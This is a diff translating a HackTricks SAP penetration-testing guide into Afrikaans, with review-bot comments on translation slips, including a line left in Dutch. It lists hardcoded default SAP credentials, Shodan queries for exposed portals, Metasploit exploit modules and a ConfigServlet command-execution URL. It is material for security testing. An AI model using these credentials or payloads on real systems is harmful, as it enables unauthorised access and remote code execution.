@@ -46,45 +43,41 @@ https://www.shodan.io/search?query=sap+portal https://www.shodan.io/search?query=SAP+Netweaver https://www.shodan.io/search?query=SAP+J2EE+Engine ``` +* Hier is hoe [http://SAP:50000/irj/portal](http://sap:50000/irj/portal) lyk -* Here is what [http://SAP:50000/irj/portal](http://sap:50000/irj/portal) looks like +![SAP Aanmeldingsskerm](https://raw.githubusercontent.com/shipcod3/mySapAdventures/master/screengrabs/sap%20logon.jpeg) -![SAP Logon screen](https://raw.githubusercontent.com/shipcod3/mySapAdventures/master/screengrabs/sap%20logon.jpeg) +* Gebruik nmap om oop poorte en bekende dienste (sap routers, webdnypro, webdienste, webbedieners, ens.) te kontroleer. +* Kruip die URL's as daar 'n webbediener aan die gang is. +* Fuzz die gidslys (jy kan Burp Intruder gebruik) as dit webbedieners op sekere poorte het. Hier is 'n paar goeie woordelyste wat deur die SecLists Project verskaf word om standaard SAP ICM-paaie en ander interessante gidslys of lêers te vind: -* Use nmap to check for open ports and known services \(sap routers, webdnypro, web services, web servers, etc.\) -* Crawl the URLs if there is a web server running. -* Fuzz the directories \(you can use Burp Intruder\) if it has web servers on certain ports. 
Here are some good wordlists provided by the SecLists Project for finding default SAP ICM Paths and other interesting directories or files: - - [https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/URLs/urls\_SAP.txt](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/URLs/urls-SAP.txt) - [https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/CMS/SAP.fuzz.txt](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/CMS/SAP.fuzz.txt) - [https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/sap.txt](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/sap.txt) - -* Use the SAP SERVICE DISCOVERY auxiliary Metasploit module for enumerating SAP instances/services/components: +[https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/URLs/urls\_SAP.txt](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/URLs/urls-SAP.txt) +[https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/CMS/SAP.fuzz.txt](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/CMS/SAP.fuzz.txt) +[https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/sap.txt](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/sap.txt) +* Gebruik die SAP SERVICE DISCOVERY hulpprogram van Metasploit vir die opspoor van SAP instansies/dienste/komponente: ```text msf > use auxiliary/scanner/sap/sap_service_discovery msf auxiliary(sap_service_discovery) > show options Module options (auxiliary/scanner/sap/sap_service_discovery): - Name Current Setting Required Description - ---- --------------- -------- ----------- - CONCURRENCY 10 yes The number of concurrent ports to check per host - INSTANCES 00-01 yes Instance numbers to scan (e.g. 
00-05,00-99) - RHOSTS yes The target address range or CIDR identifier - THREADS 1 yes The number of concurrent threads - TIMEOUT 1000 yes The socket connect timeout in milliseconds +Name Current Setting Required Description +---- --------------- -------- ----------- +CONCURRENCY 10 yes The number of concurrent ports to check per host +INSTANCES 00-01 yes Instance numbers to scan (e.g. 00-05,00-99) +RHOSTS yes The target address range or CIDR identifier +THREADS 1 yes The number of concurrent threads +TIMEOUT 1000 yes The socket connect timeout in milliseconds msf auxiliary(sap_service_discovery) > set rhosts 192.168.96.101 rhosts => 192.168.96.101 msf auxiliary(sap_service_discovery) > run [*] 192.168.96.101: - [SAP] Beginning service Discovery '192.168.96.101' ``` +## Toetsing van die Dik Kliënt / SAP GUI -## Testing the Thick Client / SAP GUI - -Here is the command to connect to SAP GUI -`sapgui ` - -* Check for default credentials \(In Bugcrowd’s Vulnerability Rating Taxonomy, this is considered as P1 -> Server Security Misconfiguration \| Using Default Credentials \| Production Server\): +Hier is die bevel om aan te sluit by SAP GUI +`sapgui ` +* Kontroleer vir verstek geloofsbriewe \(In Bugcrowd se Vulnerability Rating Taxonomy, word dit beskou as P1 -> Bediener Sekuriteitsverstellings \| Gebruik van Verstek Geloofsbriewe \| Produksie Bediener\): ```text # SAP* - High privileges - Hardcoded kernel user SAP*:06071992:* 
@@ -135,147 +128,139 @@ SAP*:Down1oad:000,001 DEVELOPER:Down1oad:001 BWDEVELOPER:Down1oad:001 ``` +* Voer Wireshark uit en verifieer by die kliënt (SAP GUI) met die geloofsbriewe wat jy gekry het, omdat sommige kliënte geloofsbriewe sonder SSL oordra. Daar is twee bekende invoegtoepassings vir Wireshark wat die hoofkoptekste wat deur die SAP DIAG-protokol gebruik word, kan ontleed: SecureAuth Labs SAP-ontledingsinvoegtoepassing en SAP DIAG-invoegtoepassing deur die Positive Research Center. +* Kontroleer vir voorregverhogings deur SAP-transaksiekodes (tcodes) vir gebruikers met lae voorregte te gebruik: +* SU01 - Om gebruikers te skep en te onderhou +* SU01D - Om gebruikers te vertoon +* SU10 - Vir massawarting +* SU02 - Vir handmatige skepping van profiele +* SM19 - Sekuriteitsoudit - konfigurasie +* SE84 - Inligtingstelsel vir SAP R/3-volmagte +* Kontroleer of jy stelselopdragte kan uitvoer / skripte kan hardloop in die kliënt. +* Kontroleer of jy XSS kan doen op BAPI Explorer -* Run Wireshark then authenticate to the client \(SAP GUI\) using the credentials you got because some clients transmit credentials without SSL. There are two known plugins for Wireshark that can dissect the main headers used by the SAP DIAG protocol too: SecureAuth Labs SAP dissection plug-in and SAP DIAG plugin by Positive Research Center. -* Check for privilege escalations like using some SAP Transaction Codes \(tcodes\) for low-privilege users: - * SU01 - To create and maintain the users - * SU01D - To Display Users - * SU10 - For mass maintenance - * SU02 - For Manual creation of profiles - * SM19 - Security audit - configuration - * SE84 - Information System for SAP R/3 Authorizations -* Check if you can execute system commands / run scripts in the client. -* Check if you can do XSS on BAPI Explorer +# Toetsing van die webkoppelvlak -# Testing the web interface +* Kruip deur die URL's (sien ontdekkingsfase). +* Fuzz die URL's soos in die ontdekkingsfase. 
Hier is hoe [http://SAP:50000/index.html](http://sap:50000/index.html) lyk: -* Crawl the URLs \(see discovery phase\). -* Fuzz the URLs like in the discovery phase. Here is what [http://SAP:50000/index.html](http://sap:50000/index.html) looks like: +![SAP Indeksbladsy](https://raw.githubusercontent.com/shipcod3/mySapAdventures/master/screengrabs/index.jpeg) -![SAP Index Page](https://raw.githubusercontent.com/shipcod3/mySapAdventures/master/screengrabs/index.jpeg) +* Soek na algemene webkwesbaarhede (Raadpleeg OWASP Top 10) omdat daar XSS, RCE, XXE, ens. kwesbaarhede in sommige plekke is. +* Kyk na Jason Haddix se "The Bug Hunters Methodology" vir toetsing van webkwesbaarhede. +* Auth Bypass deur middel van werkwoordversteuring? Miskien :) +* Maak `http://SAP:50000/webdynpro/resources/sap.com/XXX/JWFTestAddAssignees#` oop en druk dan die "Kies" knoppie en druk dan in die oop venster "Soek". Jy behoort 'n lys van SAP-gebruikers te sien (Kwesbaarheidsverwysing: [ERPSCAN-16-010](https://erpscan.com/advisories/erpscan-16-010-sap-netweaver-7-4-information-disclosure/)) +* Word die geloofsbriewe oorgedra oor HTTP? As dit wel die geval is, word dit beskou as P3 volgens Bugcrowd se [Vulnerability Rating Taxonomy](https://bugcrowd.com/vulnerability-rating-taxonomy): Gebroke outentifikasie en sessiebestuur | Swak aanmeldfunksie oor HTTP. Wenk: Kyk ook na [http://SAP:50000/startPage](http://sap:50000/startPage) of die aanmeldportale :) -* Look for common web vulnerabilities \(Refer to OWASP Top 10\) because there are XSS, RCE, XXE, etc. vulnerabilities in some places. -* Check out Jason Haddix’s [“The Bug Hunters Methodology”](https://github.com/jhaddix/tbhm) for testing web vulnerabilities. -* Auth Bypass via verb Tampering? Maybe :\) -* Open `http://SAP:50000/webdynpro/resources/sap.com/XXX/JWFTestAddAssignees#` then hit the “Choose” Button and then in the opened window press “Search”. 
You should be able to see a list of SAP users \(Vulnerability Reference: [ERPSCAN-16-010](https://erpscan.com/advisories/erpscan-16-010-sap-netweaver-7-4-information-disclosure/) \) -* Are the credentials submitted over HTTP? If it is then it is considered as P3 based on Bugcrowd’s [Vulnerability Rating Taxonomy](https://bugcrowd.com/vulnerability-rating-taxonomy): Broken Authentication and Session Management \| Weak Login Function Over HTTP. Hint: Check out [http://SAP:50000/startPage](http://sap:50000/startPage) too or the logon portals :\) - -![SAP Start Page](https://raw.githubusercontent.com/shipcod3/mySapAdventures/master/screengrabs/startPage.jpeg) - -* Try `/irj/go/km/navigation/` for possible directory listing or authentication bypass -* [http://SAP/sap/public/info](http://sap/sap/public/info) contains some juicy information: +![SAP Beginbladsy](https://raw.githubusercontent.com/shipcod3/mySapAdventures/master/screengrabs/startPage.jpeg) +* Probeer `/irj/go/km/navigation/` vir moontlike gidslys of outentifikasie-omseiling +* [http://SAP/sap/public/info](http://sap/sap/public/info) bevat 'n paar sappige inligting: ```xml - - - - 011 - 4102 - BIG - IE3 - randomnum - randomnum - BRQ - BRQ - randomnum - ORACLE - 740 - 324 - AIX - -25200 - - 192.168.1.8 - 749 - randomnum - - 192.168.1.8 - - - + + + +011 +4102 +BIG +IE3 +randomnum +randomnum +BRQ +BRQ +randomnum +ORACLE +740 +324 +AIX +-25200 + +192.168.1.8 +749 +randomnum + +192.168.1.8 + + + ``` +# Aanval! -# Attack! - -* Check if it runs on old servers or technologies like Windows 2000. -* Plan the possible exploits / attacks, there are a lot of Metasploit modules for SAP discovery \(auxiliary modules\) and exploits: - +* Kontroleer of dit op ou servers of tegnologieë soos Windows 2000 loop. 
+* Beplan die moontlike exploits / aanvalle, daar is baie Metasploit-modules vir SAP-ontdekking (hulpmodules) en exploits: ```text msf > search sap Matching Modules ================ - Name Disclosure Date Rank Description - ---- --------------- ---- ----------- - auxiliary/admin/maxdb/maxdb_cons_exec 2008-01-09 normal SAP MaxDB cons.exe Remote Command Injection - auxiliary/admin/sap/sap_configservlet_exec_noauth 2012-11-01 normal SAP ConfigServlet OS Command Execution - auxiliary/admin/sap/sap_mgmt_con_osexec normal SAP Management Console OSExecute - auxiliary/dos/sap/sap_soap_rfc_eps_delete_file normal SAP SOAP EPS_DELETE_FILE File Deletion - auxiliary/dos/windows/http/pi3web_isapi 2008-11-13 normal Pi3Web ISAPI DoS - auxiliary/dos/windows/llmnr/ms11_030_dnsapi 2011-04-12 normal Microsoft Windows DNSAPI.dll LLMNR Buffer Underrun DoS - auxiliary/scanner/http/sap_businessobjects_user_brute normal SAP BusinessObjects User Bruteforcer - auxiliary/scanner/http/sap_businessobjects_user_brute_web normal SAP BusinessObjects Web User Bruteforcer - auxiliary/scanner/http/sap_businessobjects_user_enum normal SAP BusinessObjects User Enumeration - auxiliary/scanner/http/sap_businessobjects_version_enum normal SAP BusinessObjects Version Detection - auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt normal SAP CTC Service Verb Tampering User Management - auxiliary/scanner/sap/sap_hostctrl_getcomputersystem normal SAP Host Agent Information Disclosure - auxiliary/scanner/sap/sap_icf_public_info normal SAP ICF /sap/public/info Service Sensitive Information Gathering - auxiliary/scanner/sap/sap_icm_urlscan normal SAP URL Scanner - auxiliary/scanner/sap/sap_mgmt_con_abaplog normal SAP Management Console ABAP Syslog Disclosure - auxiliary/scanner/sap/sap_mgmt_con_brute_login normal SAP Management Console Brute Force - auxiliary/scanner/sap/sap_mgmt_con_extractusers normal SAP Management Console Extract Users - auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints normal SAP 
Management Console Get Access Points - auxiliary/scanner/sap/sap_mgmt_con_getenv normal SAP Management Console getEnvironment - auxiliary/scanner/sap/sap_mgmt_con_getlogfiles normal SAP Management Console Get Logfile - auxiliary/scanner/sap/sap_mgmt_con_getprocesslist normal SAP Management Console GetProcessList - auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter normal SAP Management Console Get Process Parameters - auxiliary/scanner/sap/sap_mgmt_con_instanceproperties normal SAP Management Console Instance Properties - auxiliary/scanner/sap/sap_mgmt_con_listlogfiles normal SAP Management Console List Logfiles - auxiliary/scanner/sap/sap_mgmt_con_startprofile normal SAP Management Console getStartProfile - auxiliary/scanner/sap/sap_mgmt_con_version normal SAP Management Console Version Detection - auxiliary/scanner/sap/sap_router_info_request normal SAPRouter Admin Request - auxiliary/scanner/sap/sap_router_portscanner normal SAPRouter Port Scanner - auxiliary/scanner/sap/sap_service_discovery normal SAP Service Discovery - auxiliary/scanner/sap/sap_smb_relay normal SAP SMB Relay Abuse - auxiliary/scanner/sap/sap_soap_bapi_user_create1 normal SAP /sap/bc/soap/rfc SOAP Service BAPI_USER_CREATE1 Function User Creation - auxiliary/scanner/sap/sap_soap_rfc_brute_login normal SAP SOAP Service RFC_PING Login Brute Forcer - auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec normal SAP /sap/bc/soap/rfc SOAP Service SXPG_CALL_SYSTEM Function Command Injection - auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec normal SAP /sap/bc/soap/rfc SOAP Service SXPG_COMMAND_EXEC Function Command Injection - auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing normal SAP SOAP RFC EPS_GET_DIRECTORY_LISTING Directories Information Disclosure - auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence normal SAP SOAP RFC PFL_CHECK_OS_FILE_EXISTENCE File Existence Check - auxiliary/scanner/sap/sap_soap_rfc_ping normal SAP /sap/bc/soap/rfc 
SOAP Service RFC_PING Function Service Discovery - auxiliary/scanner/sap/sap_soap_rfc_read_table normal SAP /sap/bc/soap/rfc SOAP Service RFC_READ_TABLE Function Dump Data - auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir normal SAP SOAP RFC RZL_READ_DIR_LOCAL Directory Contents Listing - auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface normal SAP /sap/bc/soap/rfc SOAP Service SUSR_RFC_USER_INTERFACE Function User Creation - auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec normal SAP /sap/bc/soap/rfc SOAP Service SXPG_CALL_SYSTEM Function Command Execution - auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec normal SAP SOAP RFC SXPG_COMMAND_EXECUTE - auxiliary/scanner/sap/sap_soap_rfc_system_info normal SAP /sap/bc/soap/rfc SOAP Service RFC_SYSTEM_INFO Function Sensitive Information Gathering - auxiliary/scanner/sap/sap_soap_th_saprel_disclosure normal SAP /sap/bc/soap/rfc SOAP Service TH_SAPREL Function Information Disclosure - auxiliary/scanner/sap/sap_web_gui_brute_login normal SAP Web GUI Login Brute Forcer - exploit/multi/sap/sap_mgmt_con_osexec_payload 2011-03-08 excellent SAP Management Console OSExecute Payload Execution - exploit/multi/sap/sap_soap_rfc_sxpg_call_system_exec 2013-03-26 great SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution - exploit/multi/sap/sap_soap_rfc_sxpg_command_exec 2012-05-08 great SAP SOAP RFC SXPG_COMMAND_EXECUTE Remote Command Execution - exploit/windows/browser/enjoysapgui_comp_download 2009-04-15 excellent EnjoySAP SAP GUI ActiveX Control Arbitrary File Download - exploit/windows/browser/enjoysapgui_preparetoposthtml 2007-07-05 normal EnjoySAP SAP GUI ActiveX Control Buffer Overflow - exploit/windows/browser/sapgui_saveviewtosessionfile 2009-03-31 normal SAP AG SAPgui EAI WebViewer3D Buffer Overflow - exploit/windows/http/sap_configservlet_exec_noauth 2012-11-01 great SAP ConfigServlet Remote Code Execution - exploit/windows/http/sap_host_control_cmd_exec 2012-08-14 average SAP NetWeaver HostControl 
Command Injection - exploit/windows/http/sapdb_webtools 2007-07-05 great SAP DB 7.4 WebTools Buffer Overflow - exploit/windows/lpd/saplpd 2008-02-04 good SAP SAPLPD 6.28 Buffer Overflow - exploit/windows/misc/sap_2005_license 2009-08-01 great SAP Business One License Manager 2005 Buffer Overflow - exploit/windows/misc/sap_netweaver_dispatcher 2012-05-08 normal SAP NetWeaver Dispatcher DiagTraceR3Info Buffer Overflow +Name Disclosure Date Rank Description +---- --------------- ---- ----------- +auxiliary/admin/maxdb/maxdb_cons_exec 2008-01-09 normal SAP MaxDB cons.exe Remote Command Injection +auxiliary/admin/sap/sap_configservlet_exec_noauth 2012-11-01 normal SAP ConfigServlet OS Command Execution +auxiliary/admin/sap/sap_mgmt_con_osexec normal SAP Management Console OSExecute +auxiliary/dos/sap/sap_soap_rfc_eps_delete_file normal SAP SOAP EPS_DELETE_FILE File Deletion +auxiliary/dos/windows/http/pi3web_isapi 2008-11-13 normal Pi3Web ISAPI DoS +auxiliary/dos/windows/llmnr/ms11_030_dnsapi 2011-04-12 normal Microsoft Windows DNSAPI.dll LLMNR Buffer Underrun DoS +auxiliary/scanner/http/sap_businessobjects_user_brute normal SAP BusinessObjects User Bruteforcer +auxiliary/scanner/http/sap_businessobjects_user_brute_web normal SAP BusinessObjects Web User Bruteforcer +auxiliary/scanner/http/sap_businessobjects_user_enum normal SAP BusinessObjects User Enumeration +auxiliary/scanner/http/sap_businessobjects_version_enum normal SAP BusinessObjects Version Detection +auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt normal SAP CTC Service Verb Tampering User Management +auxiliary/scanner/sap/sap_hostctrl_getcomputersystem normal SAP Host Agent Information Disclosure +auxiliary/scanner/sap/sap_icf_public_info normal SAP ICF /sap/public/info Service Sensitive Information Gathering +auxiliary/scanner/sap/sap_icm_urlscan normal SAP URL Scanner +auxiliary/scanner/sap/sap_mgmt_con_abaplog normal SAP Management Console ABAP Syslog Disclosure 
+auxiliary/scanner/sap/sap_mgmt_con_brute_login normal SAP Management Console Brute Force +auxiliary/scanner/sap/sap_mgmt_con_extractusers normal SAP Management Console Extract Users +auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints normal SAP Management Console Get Access Points +auxiliary/scanner/sap/sap_mgmt_con_getenv normal SAP Management Console getEnvironment +auxiliary/scanner/sap/sap_mgmt_con_getlogfiles normal SAP Management Console Get Logfile +auxiliary/scanner/sap/sap_mgmt_con_getprocesslist normal SAP Management Console GetProcessList +auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter normal SAP Management Console Get Process Parameters +auxiliary/scanner/sap/sap_mgmt_con_instanceproperties normal SAP Management Console Instance Properties +auxiliary/scanner/sap/sap_mgmt_con_listlogfiles normal SAP Management Console List Logfiles +auxiliary/scanner/sap/sap_mgmt_con_startprofile normal SAP Management Console getStartProfile +auxiliary/scanner/sap/sap_mgmt_con_version normal SAP Management Console Version Detection +auxiliary/scanner/sap/sap_router_info_request normal SAPRouter Admin Request +auxiliary/scanner/sap/sap_router_portscanner normal SAPRouter Port Scanner +auxiliary/scanner/sap/sap_service_discovery normal SAP Service Discovery +auxiliary/scanner/sap/sap_smb_relay normal SAP SMB Relay Abuse +auxiliary/scanner/sap/sap_soap_bapi_user_create1 normal SAP /sap/bc/soap/rfc SOAP Service BAPI_USER_CREATE1 Function User Creation +auxiliary/scanner/sap/sap_soap_rfc_brute_login normal SAP SOAP Service RFC_PING Login Brute Forcer +auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec normal SAP /sap/bc/soap/rfc SOAP Service SXPG_CALL_SYSTEM Function Command Injection +auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec normal SAP /sap/bc/soap/rfc SOAP Service SXPG_COMMAND_EXEC Function Command Injection +auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing normal SAP SOAP RFC EPS_GET_DIRECTORY_LISTING Directories 
Information Disclosure +auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence normal SAP SOAP RFC PFL_CHECK_OS_FILE_EXISTENCE File Existence Check +auxiliary/scanner/sap/sap_soap_rfc_ping normal SAP /sap/bc/soap/rfc SOAP Service RFC_PING Function Service Discovery +auxiliary/scanner/sap/sap_soap_rfc_read_table normal SAP /sap/bc/soap/rfc SOAP Service RFC_READ_TABLE Function Dump Data +auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir normal SAP SOAP RFC RZL_READ_DIR_LOCAL Directory Contents Listing +auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface normal SAP /sap/bc/soap/rfc SOAP Service SUSR_RFC_USER_INTERFACE Function User Creation +auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec normal SAP /sap/bc/soap/rfc SOAP Service SXPG_CALL_SYSTEM Function Command Execution +auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec normal SAP SOAP RFC SXPG_COMMAND_EXECUTE +auxiliary/scanner/sap/sap_soap_rfc_system_info normal SAP /sap/bc/soap/rfc SOAP Service RFC_SYSTEM_INFO Function Sensitive Information Gathering +auxiliary/scanner/sap/sap_soap_th_saprel_disclosure normal SAP /sap/bc/soap/rfc SOAP Service TH_SAPREL Function Information Disclosure +auxiliary/scanner/sap/sap_web_gui_brute_login normal SAP Web GUI Login Brute Forcer +exploit/multi/sap/sap_mgmt_con_osexec_payload 2011-03-08 excellent SAP Management Console OSExecute Payload Execution +exploit/multi/sap/sap_soap_rfc_sxpg_call_system_exec 2013-03-26 great SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution +exploit/multi/sap/sap_soap_rfc_sxpg_command_exec 2012-05-08 great SAP SOAP RFC SXPG_COMMAND_EXECUTE Remote Command Execution +exploit/windows/browser/enjoysapgui_comp_download 2009-04-15 excellent EnjoySAP SAP GUI ActiveX Control Arbitrary File Download +exploit/windows/browser/enjoysapgui_preparetoposthtml 2007-07-05 normal EnjoySAP SAP GUI ActiveX Control Buffer Overflow +exploit/windows/browser/sapgui_saveviewtosessionfile 2009-03-31 normal SAP AG SAPgui EAI WebViewer3D Buffer 
Overflow +exploit/windows/http/sap_configservlet_exec_noauth 2012-11-01 great SAP ConfigServlet Remote Code Execution +exploit/windows/http/sap_host_control_cmd_exec 2012-08-14 average SAP NetWeaver HostControl Command Injection +exploit/windows/http/sapdb_webtools 2007-07-05 great SAP DB 7.4 WebTools Buffer Overflow +exploit/windows/lpd/saplpd 2008-02-04 good SAP SAPLPD 6.28 Buffer Overflow +exploit/windows/misc/sap_2005_license 2009-08-01 great SAP Business One License Manager 2005 Buffer Overflow +exploit/windows/misc/sap_netweaver_dispatcher 2012-05-08 normal SAP NetWeaver Dispatcher DiagTraceR3Info Buffer Overflow ``` - -* Try to use some known exploits \(check out Exploit-DB\) or attacks like the old but goodie “SAP ConfigServlet Remote Code Execution” in the SAP Portal: - +* Probeer om van bekende exploits gebruik te maken (bekijk Exploit-DB) of aanvallen zoals de oude maar goede "SAP ConfigServlet Remote Code Execution" in de SAP Portal: ```text http://example.com:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=uname -a ``` - ![SAP Config Servlet RCE](https://raw.githubusercontent.com/shipcod3/mySapAdventures/master/screengrabs/sap_rce.jpeg) -* Before running the `start` command on the bizploit script at the Discovery phase, you can also add the following for performing vulnerability assessment: - +* Voordat jy die `start` bevel op die bizploit skrip by die Ontdekkingsfase uitvoer, kan jy ook die volgende byvoeg vir die uitvoering van kwesbaarheidsassessering: ```text bizploit> plugins bizploit/plugins> vulnassess all 
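Review bot: A bullet is dropped rather than translated at the start of this hunk: the removed `* Are the credentials submitted over HTTP? ... Weak Login Function Over HTTP. Hint: Check out http://SAP:50000/startPage too or the logon portals` has no `+` counterpart before `+![SAP Beginbladsy]`, so the Afrikaans page loses the Bugcrowd VRT P3 classification and the startPage hint; restore it as a translated bullet. Further down, `+* Probeer om van bekende exploits gebruik te maak (bekijk Exploit-DB) of aanvallen zoals de oude maar goede ... in de SAP Portal:` is Dutch, not Afrikaans (`bekijk`, `aanvallen zoals de oude maar goede`, `in de`); it should read along the lines of `(kyk na Exploit-DB) of aanvalle soos die ou maar goeie ... in die SAP Portal`.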
@@ -297,22 +282,21 @@ bizploit/plugins> start bizploit/plugins> back bizploit> start ``` +# Ander Nuttige Gereedskap vir Toetsing -# Other Useful Tools for Testing +* [PowerSAP](https://github.com/airbus-seclab/powersap) - Powershell-gereedskap om SAP-sekuriteit te assesseer +* [Burp Suite](https://portswigger.net/burp) - 'n moet hê vir gidsfuzzing en web-sekuriteitsassessering +* [pysap](https://github.com/SecureAuthCorp/pysap) - Python-biblioteek om SAP-netwerkprotokolpakkies te skep +* [https://github.com/gelim/nmap-erpscan](https://github.com/gelim/nmap-erpscan) - Help nmap om SAP/ERP op te spoor -* [PowerSAP](https://github.com/airbus-seclab/powersap) - Powershell tool to assess sap security -* [Burp Suite](https://portswigger.net/burp) - a must have for directory fuzzing and web security assessments -* [pysap](https://github.com/SecureAuthCorp/pysap) - Python library to craft SAP network protocol packets -* [https://github.com/gelim/nmap-erpscan](https://github.com/gelim/nmap-erpscan) - Help nmap to detect SAP/ERP +## Verwysings -## References - -* [SAP Penetration Testing Using Metasploit](http://information.rapid7.com/rs/rapid7/images/SAP%20Penetration%20Testing%20Using%20Metasploit%20Final.pdf) -* [https://github.com/davehardy20/SAP-Stuff](https://github.com/davehardy20/SAP-Stuff) - a script to semi-automate Bizploit -* [SAP NetWeaver ABAP security configuration part 3: Default passwords for access to the application](https://erpscan.com/press-center/blog/sap-netweaver-abap-security-configuration-part-2-default-passwords-for-access-to-the-application/) -* [List of ABAP-transaction codes related to SAP security](https://wiki.scn.sap.com/wiki/display/Security/List+of+ABAP-transaction+codes+related+to+SAP+security) +* [SAP-penetreringstoetsing met behulp van Metasploit](http://information.rapid7.com/rs/rapid7/images/SAP%20Penetration%20Testing%20Using%20Metasploit%20Final.pdf) +* 
[https://github.com/davehardy20/SAP-Stuff](https://github.com/davehardy20/SAP-Stuff) - 'n skrip om Bizploit semi-outomaties te maak +* [SAP NetWeaver ABAP-sekuriteitskonfigurasie deel 3: Standaard wagwoorde vir toegang tot die toepassing](https://erpscan.com/press-center/blog/sap-netweaver-abap-security-configuration-part-2-default-passwords-for-access-to-the-application/) +* [Lys van ABAP-transaksiekodes wat verband hou met SAP-sekuriteit](https://wiki.scn.sap.com/wiki/display/Security/List+of+ABAP-transaction+codes+related+to+SAP+security) * [Breaking SAP Portal](https://erpscan.com/wp-content/uploads/presentations/2012-HackerHalted-Breaking-SAP-Portal.pdf) -* [Top 10 most interesting SAP vulnerabilities and attacks](https://erpscan.com/wp-content/uploads/presentations/2012-Kuwait-InfoSecurity-Top-10-most-interesting-vulnerabilities-and-attacks-in-SAP.pdf) +* [Top 10 mees interessante SAP-kwesbaarhede en aanvalle](https://erpscan.com/wp-content/uploads/presentations/2012-Kuwait-InfoSecurity-Top-10-most-interesting-vulnerabilities-and-attacks-in-SAP.pdf) * [Assessing the security of SAP ecosystems with bizploit: Discovery](https://www.onapsis.com/blog/assessing-security-sap-ecosystems-bizploit-discovery) * [https://www.exploit-db.com/docs/43859](https://www.exploit-db.com/docs/43859) * [https://resources.infosecinstitute.com/topic/pen-stesting-sap-applications-part-1/](https://resources.infosecinstitute.com/topic/pen-stesting-sap-applications-part-1/) @@ -322,16 +306,14 @@ bizploit> start
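Review bot: The reference list ends up half translated: `+* [SAP-penetreringstoetsing met behulp van Metasploit]`, `+* [SAP NetWeaver ABAP-sekuriteitskonfigurasie deel 3 ...]` and `+* [Top 10 mees interessante SAP-kwesbaarhede en aanvalle]` get Afrikaans link text, while the untouched context lines `[Breaking SAP Portal]` and `[Assessing the security of SAP ecosystems with bizploit: Discovery]` keep English. These are titles of English-language PDFs and posts; keep them verbatim so the link text still matches the linked document and the list stays consistent.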
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
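Review bot: The support footer is translated differently from the identical footer in pentesting-smb.md in this same patch: here `+* **Deel jou haktruuks deur PR's ...` and `+* As jy wil sien dat jou **maatskappy geadverteer word ...`, there `hacktruuks` and `As jy jou **maatskappy geadverteer wil sien ...`. This footer is boilerplate repeated on every page, so it should be one fixed translation (ideally substituted from a single template rather than re-translated per file) to avoid drift such as `haktruuks`/`hacktruuks`.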
